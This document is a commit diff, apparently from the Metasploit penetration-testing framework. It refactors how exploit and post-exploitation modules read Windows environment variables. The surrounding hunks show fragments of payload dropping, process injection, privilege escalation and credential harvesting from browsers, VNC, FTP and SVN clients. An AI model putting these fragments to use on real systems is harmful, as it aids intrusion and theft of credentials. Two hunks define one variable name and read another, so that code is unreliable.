Land #2782, fix expand_path abuse
commit
d27264b402
|
@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
begin
|
||||
wintemp = session.fs.file.expand_path("%TEMP%")
|
||||
wintemp = session.sys.config.getenv('TEMP')
|
||||
win_file = "#{wintemp}\\#{win_file}"
|
||||
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
||||
session.fs.file.rm(win_file)
|
||||
|
|
|
@ -68,13 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_new_session(session)
|
||||
if session.type == "meterpreter"
|
||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||
end
|
||||
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
begin
|
||||
wintemp = session.fs.file.expand_path("%TEMP%")
|
||||
wintemp = session.sys.config.getenv('TEMP')
|
||||
win_file = "#{wintemp}\\#{win_file}"
|
||||
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
||||
session.fs.file.rm(win_file)
|
||||
|
@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error("Failed to delete #{win_file}")
|
||||
false
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -74,13 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_new_session(session)
|
||||
if session.type == "meterpreter"
|
||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||
end
|
||||
|
||||
@dropped_files.each do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
@dropped_files.each do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
begin
|
||||
wintemp = session.fs.file.expand_path("%WINDIR%")
|
||||
wintemp = session.sys.config.getenv('WINDIR')
|
||||
win_file = "#{wintemp}\\Temp\\#{win_file}"
|
||||
# Meterpreter should do this automatically as part of
|
||||
# fs.file.rm(). Until that has been implemented, remove the
|
||||
|
@ -93,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error("Failed to delete #{win_file}")
|
||||
false
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -169,4 +166,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -72,13 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_new_session(session)
|
||||
if session.type == "meterpreter"
|
||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||
end
|
||||
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
begin
|
||||
wintemp = session.fs.file.expand_path("%TEMP%")
|
||||
wintemp = session.sys.config.getenv('TEMP')
|
||||
win_file = "#{wintemp}\\#{win_file}"
|
||||
# Meterpreter should do this automatically as part of
|
||||
# fs.file.rm(). Until that has been implemented, remove the
|
||||
|
@ -91,7 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error("Failed to delete #{win_file}")
|
||||
false
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -184,4 +181,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -66,13 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_new_session(session)
|
||||
if session.type == "meterpreter"
|
||||
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
|
||||
end
|
||||
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
@dropped_files.delete_if do |file|
|
||||
win_file = file.gsub("/", "\\\\")
|
||||
begin
|
||||
wintemp = session.fs.file.expand_path("%TEMP%")
|
||||
wintemp = session.sys.config.getenv('TEMP')
|
||||
win_file = "#{wintemp}\\#{win_file}"
|
||||
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
|
||||
session.fs.file.rm(win_file)
|
||||
|
@ -82,7 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_error("Failed to delete #{win_file}")
|
||||
false
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -257,4 +254,4 @@ This code allows to launch other executables with user data provided as argument
|
|||
solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other
|
||||
executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so
|
||||
the target should have the WebClient service enabled, which is only enabled by default on XP SP3.
|
||||
=end
|
||||
=end
|
||||
|
|
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Use the system path for executable to run except the wordpad
|
||||
if client.sys.config.sysinfo["OS"] =~ /Windows XP/
|
||||
windir = client.fs.file.expand_path("%ProgramFiles%")
|
||||
windir = client.sys.config.getenv('ProgramFiles')
|
||||
cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
|
||||
else # Windows 2000
|
||||
cmd = "notepad.exe"
|
||||
|
|
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# Usint this solution atm because I'm experiencing problems with railgun when trying
|
||||
# use GetTokenInformation
|
||||
def low_integrity_level?
|
||||
tmp_dir = expand_path("%TEMP%")
|
||||
tmp_dir = session.sys.config.getenv('TEMP')
|
||||
cd(tmp_dir)
|
||||
new_dir = "#{rand_text_alpha(5)}"
|
||||
begin
|
||||
|
|
|
@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
if datastore["WritableDir"] and not datastore["WritableDir"].empty?
|
||||
temp_dir = datastore["WritableDir"]
|
||||
else
|
||||
temp_dir = expand_path("%TEMP%")
|
||||
temp_dir = client.sys.config.getenv('TEMP')
|
||||
end
|
||||
|
||||
print_status("Using #{temp_dir} to drop malicious DLL...")
|
||||
|
|
|
@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
if datastore["PATH"]
|
||||
payload_path = datastore["PATH"]
|
||||
else
|
||||
payload_path = session.fs.file.expand_path("%TEMP%")
|
||||
payload_path = session.sys.config.getenv('TEMP')
|
||||
end
|
||||
|
||||
cmd_location = "#{payload_path}\\#{payload_filename}"
|
||||
|
|
|
@ -42,7 +42,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
end
|
||||
|
||||
|
||||
def check_permissions!
|
||||
# Check if you are an admin
|
||||
vprint_status('Checking admin status...')
|
||||
|
|
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
# Build a random name for the share and directory
|
||||
share_name = Rex::Text.rand_text_alphanumeric(8)
|
||||
drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
|
||||
drive = session.sys.config.getenv('SYSTEMDRIVE')
|
||||
share_dir = "#{drive}\\#{share_name}"
|
||||
|
||||
# Create them
|
||||
|
|
|
@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
cmd = datastore["CMD"] || nil
|
||||
upload_fn = nil
|
||||
|
||||
tempdir = session.fs.file.expand_path("%TEMP%")
|
||||
tempdir = session.sys.config.getenv('TEMP')
|
||||
if not cmd
|
||||
# Get the exe payload.
|
||||
exe = generate_payload_exe
|
||||
|
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# Create a new task to do our bidding, but make sure it doesn't run.
|
||||
#
|
||||
taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
|
||||
sysdir = session.fs.file.expand_path("%SystemRoot%")
|
||||
sysdir = session.sys.config.getenv('SystemRoot')
|
||||
taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
|
||||
|
||||
print_status("Creating task: #{taskname}")
|
||||
|
|
|
@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def low_integrity_level?
|
||||
tmp_dir = expand_path("%USERPROFILE%")
|
||||
tmp_dir = session.sys.config.getenv('USERPROFILE')
|
||||
cd(tmp_dir)
|
||||
new_dir = "#{rand_text_alpha(5)}"
|
||||
begin
|
||||
|
@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
if datastore['TECHNIQUE'] == 'FILE'
|
||||
payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
|
||||
begin
|
||||
tmp_dir = expand_path("%TEMP%")
|
||||
tmp_dir = session.sys.config.getenv('TEMP')
|
||||
tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
|
||||
cd(tmp_dir)
|
||||
print_status("Trying to drop payload to #{tmp_dir}...")
|
||||
|
@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
# Spawn low integrity cmd.exe
|
||||
print_status("Spawning Low Integrity Cmd Prompt")
|
||||
windir = client.fs.file.expand_path("%windir%")
|
||||
windir = session.sys.config.getenv('windir')
|
||||
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
|
||||
|
||||
count = count_cmd_procs
|
||||
|
|
|
@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def create_proc
|
||||
windir = expand_path("%windir%")
|
||||
windir = session.sys.config.getenv('windir')
|
||||
cmd = "#{windir}\\System32\\notepad.exe"
|
||||
# run hidden
|
||||
begin
|
||||
|
|
|
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
print_status("Launching notepad to host the exploit...")
|
||||
|
||||
windir = expand_path("%windir%")
|
||||
windir = session.sys.config.getenv('windir')
|
||||
cmd = "#{windir}\\SysWOW64\\notepad.exe"
|
||||
process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
|
||||
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
|
||||
|
|
|
@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# Creates a temp notepad.exe to inject payload in to given the payload
|
||||
# Returns process PID
|
||||
def create_temp_proc()
|
||||
windir = client.fs.file.expand_path("%windir%")
|
||||
windir = client.sys.config.getenv('windir')
|
||||
# Select path of executable to run depending the architecture
|
||||
if @payload_arch.first== "x86" and client.platform =~ /x86/
|
||||
cmd = "#{windir}\\System32\\notepad.exe"
|
||||
|
|
|
@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
# Writes script to target host
|
||||
def write_script_to_target(vbs,name)
|
||||
tempdir = expand_path("%TEMP%")
|
||||
tempdir = session.sys.config.getenv('TEMP')
|
||||
if name == nil
|
||||
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
|
||||
else
|
||||
|
|
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
def check
|
||||
os = sysinfo["OS"]
|
||||
if os =~ /windows/i
|
||||
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
|
||||
file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys"
|
||||
major, minor, build, revision, branch = file_version(file_path)
|
||||
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")
|
||||
|
||||
|
|
|
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# Returns path for XML and payload
|
||||
def generate_path(rexename)
|
||||
# Generate a path to write payload and XML
|
||||
path = datastore['PATH'] || expand_path("%TEMP%")
|
||||
path = datastore['PATH'] || session.sys.config.getenv('TEMP')
|
||||
xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
|
||||
rexe_path = "#{path}\\#{rexename}"
|
||||
return xml_path,rexe_path
|
||||
|
|
|
@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)
|
||||
|
||||
sysdir = session.fs.file.expand_path("%SystemRoot%")
|
||||
tmpdir = session.fs.file.expand_path("%TEMP%")
|
||||
dir_env = session.sys.config.getenvs('SystemRoot', 'TEMP')
|
||||
sysdir = dir_env['SystemRoot']
|
||||
tmpdir = dir_env['TEMP']
|
||||
|
||||
print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
|
||||
begin
|
||||
|
@ -122,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
moved = false
|
||||
configed = false
|
||||
#default path, but there should be an ImagePath registry key
|
||||
source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
|
||||
source = "#{sysdir}\\system32\\#{serv}.exe"
|
||||
#get path to exe; parse out quotes and arguments
|
||||
sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
|
||||
sourcemaybe = session.fs.file.expand_path(sourceorig)
|
||||
|
|
|
@ -190,7 +190,7 @@ Processor-Speed=#{processor_speed}
|
|||
end
|
||||
end
|
||||
|
||||
win_temp = client.fs.file.expand_path("%TEMP%")
|
||||
win_temp = client.sys.config.getenv('TEMP')
|
||||
win_file = "#{win_temp}\\#{payload_exe}"
|
||||
print_status("Attempting to delete #{win_file} ...")
|
||||
client.shell_command_token(%Q|attrib.exe -r #{win_file}|)
|
||||
|
|
|
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
begin
|
||||
print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...")
|
||||
windir = client.fs.file.expand_path("%WINDIR%")
|
||||
windir = client.sys.config.getenv('WINDIR')
|
||||
client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs")
|
||||
print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...")
|
||||
cmd = "#{windir}\\system32\\attrib.exe -r " +
|
||||
|
|
|
@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
win_file = file.gsub("/", "\\\\")
|
||||
if session.type == "meterpreter"
|
||||
begin
|
||||
windir = session.fs.file.expand_path("%WINDIR%")
|
||||
windir = session.sys.config.getenv('WINDIR')
|
||||
win_file = "#{windir}\\system32\\#{win_file}"
|
||||
# Meterpreter should do this automatically as part of
|
||||
# fs.file.rm(). Until that has been implemented, remove the
|
||||
|
|
|
@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def exists_exe?(exe)
|
||||
path = expand_path("$PATH")
|
||||
path = session.sys.config.getenv("PATH")
|
||||
if path.nil? or path.empty?
|
||||
return false
|
||||
end
|
||||
|
|
|
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
|
|||
paths = enum_users_unix
|
||||
when /win/
|
||||
@platform = :windows
|
||||
drive = session.fs.file.expand_path("%SystemDrive%")
|
||||
drive = session.sys.config.getenv('SystemDrive')
|
||||
os = session.sys.config.sysinfo['OS']
|
||||
|
||||
if os =~ /Windows 7|Vista|2008/
|
||||
|
@ -265,7 +265,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def whoami
|
||||
if @platform == :windows
|
||||
session.fs.file.expand_path("%USERNAME%")
|
||||
session.sys.config.getenv('USERNAME')
|
||||
else
|
||||
session.shell_command("whoami").chomp
|
||||
end
|
||||
|
|
|
@ -54,9 +54,8 @@ class Metasploit3 < Msf::Post
|
|||
var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment")
|
||||
output = []
|
||||
var_names.delete(nil)
|
||||
var_names.flatten.uniq.sort.each do |v|
|
||||
# Emulate the output of set and env, e.g. VAR=VALUE
|
||||
output << "#{v}=#{session.fs.file.expand_path("\%#{v}\%")}"
|
||||
session.sys.config.getenvs(*var_names.flatten.uniq.sort).each do |k, v|
|
||||
output << "#{k}=#{v}"
|
||||
end
|
||||
@output = output.join("\n")
|
||||
@ltype = "windows.environment"
|
||||
|
|
|
@ -240,7 +240,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def whoami
|
||||
if @platform == :windows
|
||||
session.fs.file.expand_path("%USERNAME%")
|
||||
session.sys.config.getenv('USERNAME')
|
||||
else
|
||||
session.shell_command("whoami").chomp
|
||||
end
|
||||
|
|
|
@ -277,7 +277,6 @@ class Metasploit3 < Msf::Post
|
|||
def get_ff_and_loot_path
|
||||
@paths = {}
|
||||
check_paths = []
|
||||
drive = expand_path("%SystemDrive%")
|
||||
loot_file = Rex::Text::rand_text_alpha(6) + ".txt"
|
||||
|
||||
case @platform
|
||||
|
@ -286,7 +285,9 @@ class Metasploit3 < Msf::Post
|
|||
print_error("You need root privileges on this platform for DECRYPT option")
|
||||
return false
|
||||
end
|
||||
tmpdir = expand_path("%TEMP%") + "\\"
|
||||
env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive')
|
||||
tmpdir = env_vars['TEMP'] + "\\"
|
||||
drive = env_vars['SystemDrive']
|
||||
# this way allows for more independent use of meterpreter
|
||||
# payload (32 and 64 bit) and cleaner code
|
||||
check_paths << drive + '\\Program Files\\Mozilla Firefox\\'
|
||||
|
@ -643,9 +644,9 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def whoami
|
||||
if @platform == :windows
|
||||
return session.fs.file.expand_path("%USERNAME%")
|
||||
session.sys.config.getenv('USERNAME')
|
||||
else
|
||||
return session.shell_command("whoami").chomp
|
||||
session.shell_command("whoami").chomp
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -307,7 +307,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def whoami
|
||||
if @platform == :windows
|
||||
session.fs.file.expand_path("%USERNAME%")
|
||||
session.sys.config.getenv('USERNAME')
|
||||
else
|
||||
session.shell_command("whoami").chomp
|
||||
end
|
||||
|
|
|
@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post
|
|||
base = "/Users/#{user}/Library/Thunderbird/Profiles/"
|
||||
when /win/
|
||||
if session.type =~ /meterpreter/
|
||||
user_profile = session.fs.file.expand_path("%APPDATA%")
|
||||
user_profile = session.sys.config.getenv('APPDATA')
|
||||
else
|
||||
user_profile = cmd_exec("echo %APPDATA%").strip
|
||||
end
|
||||
|
|
|
@ -176,7 +176,7 @@ EOS
|
|||
ring0_code.gsub!('TPTP', [pid].pack('V'))
|
||||
|
||||
# Create the malicious Keyboard Layout file...
|
||||
tmpdir = session.fs.file.expand_path("%TEMP%")
|
||||
tmpdir = session.sys.config.getenv('TEMP')
|
||||
fname = "p0wns.boom"
|
||||
dllpath = "#{tmpdir}\\#{fname}"
|
||||
fd = session.fs.file.new(dllpath, 'wb')
|
||||
|
|
|
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
|
|||
paths = []
|
||||
services = []
|
||||
vuln = ""
|
||||
@temp = session.fs.file.expand_path("%TEMP%")
|
||||
@temp = session.sys.config.getenv('TEMP')
|
||||
|
||||
if init_railgun() == :error
|
||||
return
|
||||
|
|
|
@ -233,12 +233,14 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
print_status("Searching BulletProof FTP Client installation directory...")
|
||||
# BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
|
||||
program_files_x86 = expand_path('%ProgramFiles(X86)%')
|
||||
if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/
|
||||
program_files = program_files_x86 #x64
|
||||
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
|
||||
progfilesx86 = prog_files_env['ProgramFiles(X86)']
|
||||
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
|
||||
program_files = progfilesx86 # x64
|
||||
else
|
||||
program_files = expand_path('%ProgramFiles%') #x86
|
||||
program_files = progfiles_env['ProgramFiles'] # x86
|
||||
end
|
||||
|
||||
session.fs.dir.foreach(program_files) do |dir|
|
||||
if dir =~ /BulletProof FTP Client/
|
||||
vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")
|
||||
|
|
|
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
|
|||
return
|
||||
end
|
||||
|
||||
drive = session.fs.file.expand_path("%SystemDrive%")
|
||||
drive = session.sys.config.getenv('SystemDrive')
|
||||
case session.platform
|
||||
when /win64/i
|
||||
@progs = drive + '\\Program Files (x86)\\'
|
||||
|
@ -360,6 +360,6 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def whoami
|
||||
return session.fs.file.expand_path("%USERNAME%")
|
||||
return session.sys.config.getenv('USERNAME')
|
||||
end
|
||||
end
|
||||
|
|
|
@ -40,10 +40,12 @@ class Metasploit3 < Msf::Post
|
|||
# Steam client is only 32 bit so we need to know what arch we are on so that we can use
|
||||
# the correct program files folder.
|
||||
# We will just use an x64 only defined env variable to check.
|
||||
if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/
|
||||
progs = expand_path('%ProgramFiles(X86)%') #x64
|
||||
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
|
||||
progfilesx86 = prog_files_env['ProgramFiles(X86)']
|
||||
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
|
||||
progs = progfilesx86 # x64
|
||||
else
|
||||
progs = expand_path('%ProgramFiles%') #x86
|
||||
progs = progfiles_env['ProgramFiles'] # x86
|
||||
end
|
||||
path = progs + '\\Steam\\config'
|
||||
|
||||
|
|
|
@ -103,8 +103,7 @@ class Metasploit3 < Msf::Post
|
|||
def get_config_files
|
||||
# Determine if TortoiseSVN is installed and parse config files
|
||||
savedpwds = 0
|
||||
user_appdata = session.fs.file.expand_path("%APPDATA%")
|
||||
path = user_appdata + '\\Subversion\\auth\\svn.simple\\'
|
||||
path = session.fs.file.expand_path("%APPDATA%\\Subversion\\auth\\svn.simple\\")
|
||||
print_status("Checking for configuration files in: #{path}")
|
||||
|
||||
begin
|
||||
|
|
|
@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
|
||||
def check_systemroot
|
||||
winpath = expand_path("%SYSTEMROOT%")+'\\wcx_ftp.ini'
|
||||
winpath = expand_path("%SYSTEMROOT%\\wcx_ftp.ini")
|
||||
check_other(winpath)
|
||||
end
|
||||
|
||||
|
|
|
@ -98,11 +98,15 @@ class Metasploit3 < Msf::Post
|
|||
locations = []
|
||||
|
||||
#Checks
|
||||
locations << {:name => 'UltraVNC',
|
||||
:check_file => session.fs.file.expand_path("%PROGRAMFILES%")+'\\UltraVNC\\ultravnc.ini',
|
||||
:pass_variable => 'passwd=',
|
||||
:viewonly_variable => 'passwd2=',
|
||||
:port_variable => 'PortNumber='}
|
||||
progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)')
|
||||
progfiles_env.each do |k, v|
|
||||
next if v.blank?
|
||||
locations << {:name => 'UltraVNC',
|
||||
:check_file => "#{v}\\UltraVNC\\ultravnc.ini",
|
||||
:pass_variable => 'passwd=',
|
||||
:viewonly_variable => 'passwd2=',
|
||||
:port_variable => 'PortNumber='}
|
||||
end
|
||||
|
||||
locations << {:name => 'WinVNC3_HKLM',
|
||||
:check_reg => 'HKLM\\Software\\ORL\\WinVNC3',
|
||||
|
|
|
@ -237,7 +237,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def run
|
||||
print_status("Looking for WinSCP.ini file storage...")
|
||||
get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini')
|
||||
get_ini(client.fs.file.expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini"))
|
||||
print_status("Looking for Registry Storage...")
|
||||
get_reg()
|
||||
print_status("Done!")
|
||||
|
|
|
@ -53,7 +53,8 @@ class Metasploit3 < Msf::Post
|
|||
user = session.sys.config.getuid
|
||||
userpath = nil
|
||||
useroffcpath = nil
|
||||
sysdrv = session.fs.file.expand_path("%SystemDrive%")
|
||||
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
|
||||
sysdrv = env_vars['SystemDrive']
|
||||
if os =~ /Windows 7|Vista|2008/
|
||||
userpath = sysdrv + "\\Users\\"
|
||||
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
|
||||
|
@ -76,7 +77,7 @@ class Metasploit3 < Msf::Post
|
|||
userinfo = {}
|
||||
end
|
||||
else
|
||||
uservar = session.fs.file.expand_path("%USERNAME%")
|
||||
uservar = env_vars['USERNAME']
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userpath'] = userpath + uservar + lnkpath
|
||||
userinfo['useroffcpath'] = userpath + uservar + officelnkpath
|
||||
|
|
|
@ -285,7 +285,8 @@ class Metasploit3 < Msf::Post
|
|||
host = session.session_host
|
||||
|
||||
#Get Google Chrome user data path
|
||||
sysdrive = expand_path("%SYSTEMDRIVE%").strip
|
||||
env_vars = session.sys.config.getenvs('SYSTEMDRIVE', 'USERNAME')
|
||||
sysdrive = env_vars['SYSTEMDRIVE'].strip
|
||||
if directory?("#{sysdrive}\\Users")
|
||||
@profiles_path = "#{sysdrive}/Users"
|
||||
@data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
|
||||
|
@ -310,7 +311,7 @@ class Metasploit3 < Msf::Post
|
|||
else
|
||||
uid = session.sys.config.getuid
|
||||
print_status "Running as user '#{uid}'..."
|
||||
usernames << expand_path("%USERNAME%").strip
|
||||
usernames << env_vars['USERNAME'].strip
|
||||
end
|
||||
|
||||
has_sqlite3 = true
|
||||
|
|
|
@ -292,7 +292,7 @@ class Metasploit3 < Msf::Post
|
|||
return results
|
||||
end
|
||||
|
||||
windir = session.fs.file.expand_path("%windir%")
|
||||
windir = session.sys.config.getenv('windir')
|
||||
getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
|
||||
|
||||
data = nil
|
||||
|
@ -332,7 +332,7 @@ class Metasploit3 < Msf::Post
|
|||
elsif exist?(val_location + "\\my.cnf")
|
||||
data = read_file(val_location + "\\my.cnf")
|
||||
else
|
||||
sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
|
||||
sysdriv=session.sys.config.getenv('SYSTEMDRIVE')
|
||||
getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
|
||||
getfile.each do |file|
|
||||
if exist?("#{file['path']}\\#{file['name']}")
|
||||
|
|
|
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
|
||||
def download_files(location, file_type)
|
||||
sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%")
|
||||
sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
|
||||
sysnfo = client.sys.config.sysinfo['OS']
|
||||
profile_path_old = sysdriv + "\\Documents and Settings\\"
|
||||
profile_path_new = sysdriv + "\\Users\\"
|
||||
|
|
|
@ -257,7 +257,7 @@ class Metasploit3 < Msf::Post
|
|||
xp_c = "\\Cookies\\index.dat"
|
||||
h_paths = []
|
||||
c_paths = []
|
||||
base = session.fs.file.expand_path("%USERPROFILE%")
|
||||
base = session.sys.config.getenv('USERPROFILE')
|
||||
if host['OS'] =~ /(Windows 7|2008|Vista)/
|
||||
h_paths << base + vist_h
|
||||
h_paths << base + vist_hlow
|
||||
|
|
|
@ -28,7 +28,8 @@ class Metasploit3 < Msf::Post
|
|||
users = []
|
||||
user = session.sys.config.getuid
|
||||
path4users = ""
|
||||
sysdrv = session.fs.file.expand_path("%SystemDrive%")
|
||||
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
|
||||
sysdrv = env_vars['SystemDrive']
|
||||
|
||||
if os =~ /Windows 7|Vista|2008/
|
||||
path4users = sysdrv + "\\Users\\"
|
||||
|
@ -49,7 +50,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
else
|
||||
userinfo = {}
|
||||
uservar = session.fs.file.expand_path("%USERNAME%")
|
||||
uservar = env_vars['USERNAME']
|
||||
userinfo['username'] = uservar
|
||||
userinfo['userappdata'] = path4users + uservar + profilepath
|
||||
users << userinfo
|
||||
|
@ -89,7 +90,7 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
if powershell_version =~ /2./
|
||||
print_status("Powershell Modules:")
|
||||
powershell_module_path = session.fs.file.expand_path("%PSModulePath%")
|
||||
powershell_module_path = session.sys.config.getenv('PSModulePath')
|
||||
session.fs.dir.foreach(powershell_module_path) do |m|
|
||||
next if m =~ /^(\.|\.\.)$/
|
||||
print_status("\t#{m}")
|
||||
|
|
|
@ -183,7 +183,7 @@ class Metasploit3 < Msf::Post
|
|||
print_prefetch_key_value
|
||||
print_timezone_key_values(key_value)
|
||||
print_good("Current UTC Time: %s" % Time.now.utc)
|
||||
sys_root = expand_path("%SYSTEMROOT%")
|
||||
sys_root = session.sys.config.getenv('SYSTEMROOT')
|
||||
full_path = sys_root + "\\Prefetch\\"
|
||||
file_type = "*.pf"
|
||||
print_status("Gathering information from remote system. This will take awhile..")
|
||||
|
|
|
@ -115,7 +115,7 @@ class Metasploit3 < Msf::Post
|
|||
# Initialize all 7 possible paths for the answer file
|
||||
#
|
||||
def init_paths
|
||||
drive = session.fs.file.expand_path("%SystemDrive%")
|
||||
drive = session.sys.config.getenv('SystemDrive')
|
||||
|
||||
files =
|
||||
[
|
||||
|
|
|
